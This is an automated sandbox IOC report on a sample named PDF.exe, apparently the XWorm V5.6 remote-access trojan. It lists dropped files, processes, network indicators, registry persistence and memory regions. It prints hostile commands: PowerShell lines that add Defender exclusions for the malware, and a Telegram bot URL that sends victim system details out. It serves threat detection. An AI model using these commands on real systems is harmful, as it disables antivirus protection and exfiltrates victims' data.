IOC Report
PDF.exe

loading gif

Files

File Path
Type
Category
Malicious
PDF.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\XClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\Log.tmp
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1t4f1zhy.vks.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33nkn4nr.0kb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hnxsbv3.r14.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5c0kazp1.vdg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bicpcwxf.cpa.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cabcqsr0.vel.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gz2nxz4j.lf5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jav55545.y45.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2lmzdkt.kuv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lns0gbfq.r5r.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mj1wj1wl.m0r.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odka4pk1.5jz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkl00lyf.s4r.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_terwkftw.twb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tz1zyb2x.2l2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ueuujobp.jmt.ps1
ASCII text, with no line terminators
dropped
There are 11 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\PDF.exe
"C:\Users\user\Desktop\PDF.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PDF.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PDF.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
malicious
C:\Users\user\AppData\Local\Temp\XClient.exe
"C:\Users\user\AppData\Local\Temp\XClient.exe"
malicious
C:\Users\user\AppData\Local\Temp\XClient.exe
"C:\Users\user\AppData\Local\Temp\XClient.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
tr3.localto.net
malicious
https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB97C9347C020046B4843%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20PYW79587S%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6
149.154.167.220
malicious
http://go.microsoft.co
unknown
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://api.telegram.org/bot
unknown
http://crl.microso
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 8 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
tr3.localto.net
185.141.35.22
malicious
ip-api.com
208.95.112.1
malicious
api.telegram.org
149.154.167.220
malicious

IPs

IP
Domain
Country
Malicious
208.95.112.1
ip-api.com
United States
malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
185.141.35.22
tr3.localto.net
Turkey
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
XClient
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PDF_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
28D1000
trusted library allocation
page read and write
malicious
642000
unkown
page readonly
malicious
128D1000
trusted library allocation
page read and write
malicious
16700C06000
trusted library allocation
page read and write
118082C9000
trusted library allocation
page read and write
7FFD9B892000
trusted library allocation
page read and write
BBA000
heap
page read and write
16773923000
heap
page read and write
7FFD9BA48000
trusted library allocation
page read and write
268F88A2000
heap
page read and write
1270000
heap
page read and write
C2DCBBE000
stack
page read and write
118090AE000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page read and write
1180649A000
heap
page read and write
167102EB000
trusted library allocation
page read and write
11809EC8000
trusted library allocation
page read and write
1B29A000
stack
page read and write
268F8606000
heap
page execute and read and write
D80000
trusted library allocation
page read and write
7FFD9B756000
trusted library allocation
page read and write
268DFFF0000
heap
page read and write
7FFD9B6E3000
trusted library allocation
page execute and read and write
7FFD9BAF0000
trusted library allocation
page read and write
129F8000
trusted library allocation
page read and write
118206C7000
heap
page read and write
16700FA5000
trusted library allocation
page read and write
1182075E000
heap
page read and write
2BCA8A05000
trusted library allocation
page read and write
268F0031000
trusted library allocation
page read and write
29CFCD000
stack
page read and write
268E1034000
trusted library allocation
page read and write
7FFD9BAEE000
trusted library allocation
page read and write
7FFD9B88A000
trusted library allocation
page read and write
7FFD9B800000
trusted library allocation
page execute and read and write
1182074C000
heap
page read and write
2BCA5069000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
C2DC6FE000
stack
page read and write
268F02F0000
trusted library allocation
page read and write
7FFD9B890000
trusted library allocation
page execute and read and write
7FFD9B8F0000
trusted library allocation
page read and write
268DFEB0000
trusted library allocation
page read and write
2BCBEC0A000
heap
page read and write
16701E28000
trusted library allocation
page read and write
16700FA3000
trusted library allocation
page read and write
1180645C000
heap
page read and write
1B7F0000
heap
page execute and read and write
16701161000
trusted library allocation
page read and write
2BCA4F90000
heap
page read and write
2BCBF45F000
heap
page read and write
2BCBF050000
heap
page read and write
11808CA1000
trusted library allocation
page read and write
F6D718C000
stack
page read and write
167013C5000
trusted library allocation
page read and write
16775BFA000
heap
page read and write
7FFD9B8E0000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page read and write
268F8004000
heap
page read and write
7FFD9B8C0000
trusted library allocation
page read and write
2BCA5220000
trusted library allocation
page read and write
1677392F000
heap
page read and write
268E1098000
trusted library allocation
page read and write
16775AF0000
heap
page read and write
268F84BA000
heap
page read and write
7FFD9B770000
trusted library allocation
page execute and read and write
2BCA5230000
heap
page readonly
11806410000
heap
page read and write
268E0FA1000
trusted library allocation
page read and write
2BCA7E1D000
trusted library allocation
page read and write
129F1000
trusted library allocation
page read and write
64E000
unkown
page readonly
A40000
heap
page read and write
11809EA4000
trusted library allocation
page read and write
2BCBF3FD000
heap
page read and write
1C49E000
stack
page read and write
2BCA89E0000
trusted library allocation
page read and write
2BCA5270000
trusted library allocation
page read and write
7FFD9B6DD000
trusted library allocation
page execute and read and write
7FFD9BA30000
trusted library allocation
page read and write
268F88C3000
heap
page read and write
268F8600000
heap
page execute and read and write
10DF000
heap
page read and write
C2DC979000
stack
page read and write
118204E0000
heap
page execute and read and write
C2DC67E000
stack
page read and write
7FFD9BA1C000
trusted library allocation
page read and write
1182077E000
heap
page read and write
7FFD9B790000
trusted library allocation
page read and write
29FC000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
7FFD9BA34000
trusted library allocation
page read and write
167739C0000
trusted library section
page read and write
118099F2000
trusted library allocation
page read and write
7FFD9B6ED000
trusted library allocation
page execute and read and write
118080A1000
trusted library allocation
page read and write
F6D62B8000
stack
page read and write
7FFD9BA39000
trusted library allocation
page read and write
2BCA5027000
heap
page read and write
1B303000
heap
page read and write
11806423000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
1B3BF000
stack
page read and write
7FFD9B6C4000
trusted library allocation
page read and write
29C37A000
stack
page read and write
268DE680000
trusted library allocation
page read and write
167739F5000
heap
page read and write
7FFD9B7C0000
trusted library allocation
page execute and read and write
7FFD9B940000
trusted library allocation
page read and write
1B40E000
stack
page read and write
F6D5E7D000
stack
page read and write
118093B0000
trusted library allocation
page read and write
C2DD90D000
stack
page read and write
29BEFF000
stack
page read and write
7FFD9B6C0000
trusted library allocation
page read and write
167012A4000
trusted library allocation
page read and write
16700D72000
trusted library allocation
page read and write
7FFD9B850000
trusted library allocation
page read and write
16775BE3000
heap
page read and write
268E1892000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
2BCBF0EF000
heap
page read and write
268E11DF000
trusted library allocation
page read and write
268E1E2A000
trusted library allocation
page read and write
7FFD9B89A000
trusted library allocation
page read and write
C2DC877000
stack
page read and write
167758A0000
heap
page execute and read and write
16700DB7000
trusted library allocation
page read and write
7FFD9B6ED000
trusted library allocation
page execute and read and write
C2DCCBE000
stack
page read and write
7FFD9B930000
trusted library allocation
page read and write
7FFD9B8B4000
trusted library allocation
page read and write
268F02F2000
trusted library allocation
page read and write
7FFD9B6C2000
trusted library allocation
page read and write
16775C09000
heap
page read and write
11806310000
heap
page read and write
C2DD70E000
stack
page read and write
7FFD9B6E0000
trusted library allocation
page read and write
16775B82000
heap
page read and write
16775944000
heap
page read and write
7FFD9B8B2000
trusted library allocation
page read and write
1180642F000
heap
page read and write
7DF4859A0000
trusted library allocation
page execute and read and write
167751D0000
trusted library allocation
page read and write
7FFD9B6F0000
trusted library allocation
page read and write
7FFD9B861000
trusted library allocation
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
1AF7D000
stack
page read and write
7FFD9BB40000
trusted library allocation
page read and write
268DE690000
heap
page readonly
16775AF8000
heap
page read and write
7FFD9BA04000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
AB6000
heap
page read and write
1BA4E000
stack
page read and write
11807EC5000
heap
page read and write
F6D623E000
stack
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
2BCA7F91000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
7FFD9B6C0000
trusted library allocation
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
11808C99000
trusted library allocation
page read and write
268DFFF5000
heap
page read and write
118183A9000
trusted library allocation
page read and write
141E000
stack
page read and write
268DE4A5000
heap
page read and write
F6D60F7000
stack
page read and write
7FFD9BB50000
trusted library allocation
page read and write
7FFD9B75C000
trusted library allocation
page execute and read and write
11808128000
trusted library allocation
page read and write
118180A1000
trusted library allocation
page read and write
7F0000
heap
page read and write
2BCA6C86000
trusted library allocation
page read and write
2BCBF2C8000
heap
page read and write
16701E03000
trusted library allocation
page read and write
D93000
trusted library allocation
page read and write
7FFD9BB30000
trusted library allocation
page read and write
7FFD9BB00000
trusted library allocation
page read and write
7FFD9B8C8000
trusted library allocation
page read and write
7FFD9B8C4000
trusted library allocation
page read and write
DB0000
heap
page execute and read and write
7FFD9B9E0000
trusted library allocation
page read and write
2BCBF2CC000
heap
page read and write
1CCAE000
stack
page read and write
268F8728000
heap
page read and write
7FFD9B6F0000
trusted library allocation
page read and write
7FFD9BAEC000
trusted library allocation
page read and write
7FFD9B840000
trusted library allocation
page read and write
2BCA7D2E000
trusted library allocation
page read and write
F6D6F8F000
stack
page read and write
1B36D000
stack
page read and write
C2DCC3F000
stack
page read and write
268F8468000
heap
page read and write
C2DCAB8000
stack
page read and write
1B9AE000
stack
page read and write
167758A6000
heap
page execute and read and write
1B2D0000
heap
page read and write
16775B26000
heap
page read and write
16773760000
heap
page read and write
D90000
trusted library allocation
page read and write
27C0000
heap
page read and write
2BCA5240000
trusted library allocation
page read and write
C2DCB3B000
stack
page read and write
11806550000
heap
page read and write
11820717000
heap
page read and write
29B9A3000
stack
page read and write
38B45FC000
stack
page read and write
7FFD9B850000
trusted library allocation
page execute and read and write
268E12AE000
trusted library allocation
page read and write
1110000
heap
page read and write
118091CC000
trusted library allocation
page read and write
268DE4E7000
heap
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1050000
heap
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
C2F000
heap
page read and write
1670186A000
trusted library allocation
page read and write
C2DC3FE000
stack
page read and write
16701952000
trusted library allocation
page read and write
2BCA52C0000
heap
page read and write
268F84AA000
heap
page read and write
2BCA7C30000
trusted library allocation
page read and write
2BCB6C31000
trusted library allocation
page read and write
268F8895000
heap
page read and write
268E186B000
trusted library allocation
page read and write
7FFD9B891000
trusted library allocation
page read and write
16701211000
trusted library allocation
page read and write
2BCBF302000
heap
page read and write
7FFD9B766000
trusted library allocation
page read and write
7FFD9B73C000
trusted library allocation
page execute and read and write
C2DC373000
stack
page read and write
118205F4000
heap
page read and write
268F8866000
heap
page read and write
118180D1000
trusted library allocation
page read and write
2BCBF128000
heap
page read and write
268DE4A1000
heap
page read and write
268DE6D0000
heap
page read and write
7FFD9BA24000
trusted library allocation
page read and write
167759D0000
heap
page read and write
29BC7E000
stack
page read and write
268E10C4000
trusted library allocation
page read and write
11808AF2000
trusted library allocation
page read and write
7FFD9B6BD000
trusted library allocation
page execute and read and write
16701E23000
trusted library allocation
page read and write
F31000
stack
page read and write
7FFD9B7D0000
trusted library allocation
page execute and read and write
7FFD9B6B3000
trusted library allocation
page execute and read and write
7FFD9B6B2000
trusted library allocation
page read and write
2BCA6BC0000
heap
page execute and read and write
2BCBF0B3000
heap
page read and write
7FFD9BB26000
trusted library allocation
page read and write
268E0DE5000
trusted library allocation
page read and write
7FFD9B910000
trusted library allocation
page read and write
7FFD9B6BD000
trusted library allocation
page execute and read and write
7FFD9BA00000
trusted library allocation
page read and write
16775ACA000
heap
page read and write
29E0000
heap
page execute and read and write
7FFD9BA50000
trusted library allocation
page read and write
2BCA7DE4000
trusted library allocation
page read and write
16700F9D000
trusted library allocation
page read and write
268F8714000
heap
page read and write
7FFD9BAD2000
trusted library allocation
page read and write
7FFD9BA42000
trusted library allocation
page read and write
2BCA6C01000
trusted library allocation
page read and write
7FFD9B8E0000
trusted library allocation
page read and write
268F0072000
trusted library allocation
page read and write
C2DD98E000
stack
page read and write
29C3FE000
stack
page read and write
118065B0000
trusted library allocation
page read and write
2BCBF440000
heap
page read and write
1BD4D000
stack
page read and write
7FFD9B900000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
7FFD9B9AE000
trusted library allocation
page read and write
268DE3E0000
heap
page read and write
268F854E000
heap
page read and write
7FFD9B850000
trusted library allocation
page read and write
268E13CB000
trusted library allocation
page read and write
A90000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
38B3F7E000
stack
page read and write
2BCBF307000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
7FFD9BA39000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
38B44FF000
stack
page read and write
7FFD9B7D0000
trusted library allocation
page execute and read and write
2BCA50A6000
heap
page read and write
7FFD9B950000
trusted library allocation
page read and write
C2DD78C000
stack
page read and write
7FFD9B76C000
trusted library allocation
page execute and read and write
2BCA6E28000
trusted library allocation
page read and write
2BCA84F5000
trusted library allocation
page read and write
1076000
heap
page read and write
167739F0000
heap
page read and write
268F84F7000
heap
page read and write
7FFD9B6B2000
trusted library allocation
page read and write
29F1000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
16710031000
trusted library allocation
page read and write
268F8752000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
268DE630000
heap
page read and write
2BCBF37B000
heap
page read and write
7FFD9B6CB000
trusted library allocation
page read and write
2BCA6B10000
heap
page read and write
7FFD9B950000
trusted library allocation
page read and write
F6D5F7F000
stack
page read and write
7FFD9B6E4000
trusted library allocation
page read and write
1C5A0000
heap
page read and write
268F88C0000
heap
page read and write
2BCA4F80000
heap
page read and write
268F849D000
heap
page read and write
16775AE8000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
7FFD9B796000
trusted library allocation
page execute and read and write
7FFD9B6B4000
trusted library allocation
page read and write
268E0A52000
trusted library allocation
page read and write
11807E90000
heap
page execute and read and write
167004CD000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
BBD000
heap
page read and write
7FFD9B870000
trusted library allocation
page execute and read and write
1180645A000
heap
page read and write
7FFD9B6B4000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
7FFD9B6D3000
trusted library allocation
page execute and read and write
29C079000
stack
page read and write
2BCA5200000
trusted library allocation
page read and write
7FFD9B70C000
trusted library allocation
page execute and read and write
7FFD9BA42000
trusted library allocation
page read and write
268DFFFA000
heap
page read and write
2BCBF414000
heap
page read and write
268F84B8000
heap
page read and write
2BCBF1B0000
heap
page execute and read and write
2BCBF454000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9B870000
trusted library allocation
page read and write
7FFD9BA48000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
7FFD9B6E0000
trusted library allocation
page read and write
E55000
heap
page read and write
268F8724000
heap
page read and write
126F000
stack
page read and write
16775AEC000
heap
page read and write
38B4079000
stack
page read and write
7FFD9B9E3000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
1300000
trusted library allocation
page read and write
1BB4E000
stack
page read and write
118204A9000
heap
page read and write
167738D7000
heap
page read and write
F6D643E000
stack
page read and write
268F8630000
heap
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
7FFD9B6E2000
trusted library allocation
page read and write
1180913D000
trusted library allocation
page read and write
268F0021000
trusted library allocation
page read and write
167738D2000
heap
page read and write
2BCBF2DC000
heap
page read and write
7FFD9B960000
trusted library allocation
page read and write
118065E5000
heap
page read and write
167102F9000
trusted library allocation
page read and write
7FFD9B86A000
trusted library allocation
page read and write
7FFD9B6D4000
trusted library allocation
page read and write
10DD000
heap
page read and write
7FFD9B796000
trusted library allocation
page execute and read and write
118090DA000
trusted library allocation
page read and write
E00000
heap
page read and write
16775C0E000
heap
page read and write
1677388B000
heap
page read and write
D50000
heap
page read and write
167758FC000
heap
page read and write
7FFD9B930000
trusted library allocation
page read and write
11820810000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
2BCA4FB0000
heap
page read and write
7FFD9B70C000
trusted library allocation
page execute and read and write
268F8718000
heap
page read and write
BE9000
heap
page read and write
A20000
heap
page read and write
11820519000
heap
page read and write
F6D5EFE000
stack
page read and write
29BCFE000
stack
page read and write
268DE4A7000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
7FFD9B70C000
trusted library allocation
page execute and read and write
7A1000
stack
page read and write
1180644D000
heap
page read and write
7FFD9BB00000
trusted library allocation
page read and write
11806418000
heap
page read and write
7FFD9B6A3000
trusted library allocation
page execute and read and write
2BCA505D000
heap
page read and write
2CEB000
trusted library allocation
page read and write
2BCA7B7B000
trusted library allocation
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
268F8471000
heap
page read and write
1C89A000
stack
page read and write
268F871C000
heap
page read and write
109C000
heap
page read and write
B1C000
heap
page read and write
118205F0000
heap
page read and write
7FFD9BB36000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
C2DC8FE000
stack
page read and write
268E1DE0000
trusted library allocation
page read and write
7FFD9B6CD000
trusted library allocation
page execute and read and write
F90000
heap
page read and write
7FFD9B6D0000
trusted library allocation
page read and write
1CDAE000
stack
page read and write
7FFD9B960000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page read and write
11818390000
trusted library allocation
page read and write
7FFD9B6E3000
trusted library allocation
page execute and read and write
2BCA5020000
heap
page read and write
11807ED6000
heap
page read and write
28CE000
stack
page read and write
2BCA846C000
trusted library allocation
page read and write
167739D0000
trusted library section
page read and write
16701004000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
1180856E000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
16700A52000
trusted library allocation
page read and write
7FFD9BB20000
trusted library allocation
page read and write
12DE3000
trusted library allocation
page read and write
38B42F8000
stack
page read and write
11820510000
heap
page read and write
38B41FD000
stack
page read and write
7FFD9B6C4000
trusted library allocation
page read and write
11807D90000
trusted library allocation
page read and write
7FFD9B8F1000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
F6D633A000
stack
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
1B300000
heap
page read and write
7FFD9B6C2000
trusted library allocation
page read and write
7FFD9B6CD000
trusted library allocation
page execute and read and write
2BCA7EB0000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
268F8450000
heap
page read and write
11808090000
heap
page read and write
640000
unkown
page readonly
7FFD9B796000
trusted library allocation
page read and write
1BFE5000
stack
page read and write
16701308000
trusted library allocation
page read and write
7DF4879A0000
trusted library allocation
page execute and read and write
7FFD9B8B0000
trusted library allocation
page execute and read and write
268DE410000
heap
page read and write
16775340000
heap
page execute and read and write
C58000
heap
page read and write
16701DDE000
trusted library allocation
page read and write
1A900000
trusted library allocation
page read and write
2BCA7A92000
trusted library allocation
page read and write
11809283000
trusted library allocation
page read and write
16773950000
heap
page read and write
7FFD9B6B3000
trusted library allocation
page execute and read and write
E05000
heap
page read and write
B80000
heap
page read and write
1425000
heap
page read and write
7FFD9B8C0000
trusted library allocation
page execute and read and write
7FFD9BA40000
trusted library allocation
page read and write
C2DD889000
stack
page read and write
7DF4E7EE0000
trusted library allocation
page execute and read and write
7FFD9B7F0000
trusted library allocation
page execute and read and write
38B447F000
stack
page read and write
2BCB6E44000
trusted library allocation
page read and write
1180934F000
trusted library allocation
page read and write
7DF4E7ED0000
trusted library allocation
page execute and read and write
F6D61F7000
stack
page read and write
1B77D000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
7FFD9B850000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page read and write
1135000
heap
page read and write
BB0000
heap
page read and write
2F2C000
trusted library allocation
page read and write
2BCBF2D8000
heap
page read and write
7FFD9B6FC000
trusted library allocation
page execute and read and write
B89000
heap
page read and write
DC0000
heap
page execute and read and write
2BCA7B72000
trusted library allocation
page read and write
167739E0000
trusted library allocation
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
2BCBF2C4000
heap
page read and write
2BCA52B0000
trusted library allocation
page read and write
7FFD9B796000
trusted library allocation
page execute and read and write
7FFD9B6A0000
trusted library allocation
page read and write
268E1218000
trusted library allocation
page read and write
2BCA507D000
heap
page read and write
107C000
heap
page read and write
BC0000
unkown
page readonly
38B50CE000
stack
page read and write
11820600000
heap
page read and write
16775901000
heap
page read and write
29D0CE000
stack
page read and write
1182060C000
heap
page read and write
2A01000
trusted library allocation
page read and write
7FFD9BB40000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page read and write
29BE79000
stack
page read and write
1420000
heap
page read and write
7FFD9BB20000
trusted library allocation
page read and write
2BCB6EF0000
trusted library allocation
page read and write
268F8644000
heap
page read and write
2BCA70CD000
trusted library allocation
page read and write
1146000
heap
page read and write
7FFD9B6BD000
trusted library allocation
page execute and read and write
38B3FFE000
stack
page read and write
268F8610000
heap
page read and write
2BCA7FCD000
trusted library allocation
page read and write
268F02FA000
trusted library allocation
page read and write
11807DC0000
trusted library allocation
page read and write
38B3EFE000
stack
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
2BCB6C70000
trusted library allocation
page read and write
16700001000
trusted library allocation
page read and write
7FFD9B760000
trusted library allocation
page execute and read and write
AF1000
stack
page read and write
38B40FE000
stack
page read and write
268F881B000
heap
page read and write
7FFD9BA38000
trusted library allocation
page read and write
2BCBF450000
heap
page read and write
11808DAD000
trusted library allocation
page read and write
D7E000
stack
page read and write
1142000
heap
page read and write
2BCA7B6E000
trusted library allocation
page read and write
268E1E05000
trusted library allocation
page read and write
16775BA5000
heap
page read and write
1AE5D000
stack
page read and write
7FFD9BA70000
trusted library allocation
page read and write
2BCA5067000
heap
page read and write
29CE4E000
stack
page read and write
F6D607E000
stack
page read and write
7FFD9B6CB000
trusted library allocation
page execute and read and write
268F8475000
heap
page read and write
268E1953000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
7FFD9B79C000
trusted library allocation
page execute and read and write
2BCA7B7F000
trusted library allocation
page read and write
11809EC3000
trusted library allocation
page read and write
1C5CA000
heap
page read and write
268E04CD000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
11809E7E000
trusted library allocation
page read and write
C22000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
268E0EF3000
trusted library allocation
page read and write
1B57E000
stack
page read and write
7FFD9B800000
trusted library allocation
page execute and read and write
29BD7E000
stack
page read and write
167759F5000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
2BCA50AA000
heap
page read and write
7FFD9B786000
trusted library allocation
page execute and read and write
2BCB7048000
trusted library allocation
page read and write
38B5147000
stack
page read and write
BE7000
heap
page read and write
2BCBF148000
heap
page read and write
7FF4A9810000
trusted library allocation
page execute and read and write
C2DCA37000
stack
page read and write
2BCA70B4000
trusted library allocation
page read and write
7FFD9B78C000
trusted library allocation
page execute and read and write
167102F1000
trusted library allocation
page read and write
F6D653E000
stack
page read and write
268F8710000
heap
page read and write
118203E0000
heap
page read and write
16775ACC000
heap
page read and write
16775AFC000
heap
page read and write
268DE460000
heap
page read and write
1BAAF000
stack
page read and write
38B3BDF000
stack
page read and write
7FFD9B6BD000
trusted library allocation
page execute and read and write
7FFD9B7C6000
trusted library allocation
page execute and read and write
F6D5BE3000
stack
page read and write
7FFD9BA4A000
trusted library allocation
page read and write
7FFD9B790000
trusted library allocation
page read and write
2BCB6EEE000
trusted library allocation
page read and write
11806494000
heap
page read and write
2BCA7C36000
trusted library allocation
page read and write
16701093000
trusted library allocation
page read and write
7FFD9B6AD000
trusted library allocation
page execute and read and write
7FFD9B900000
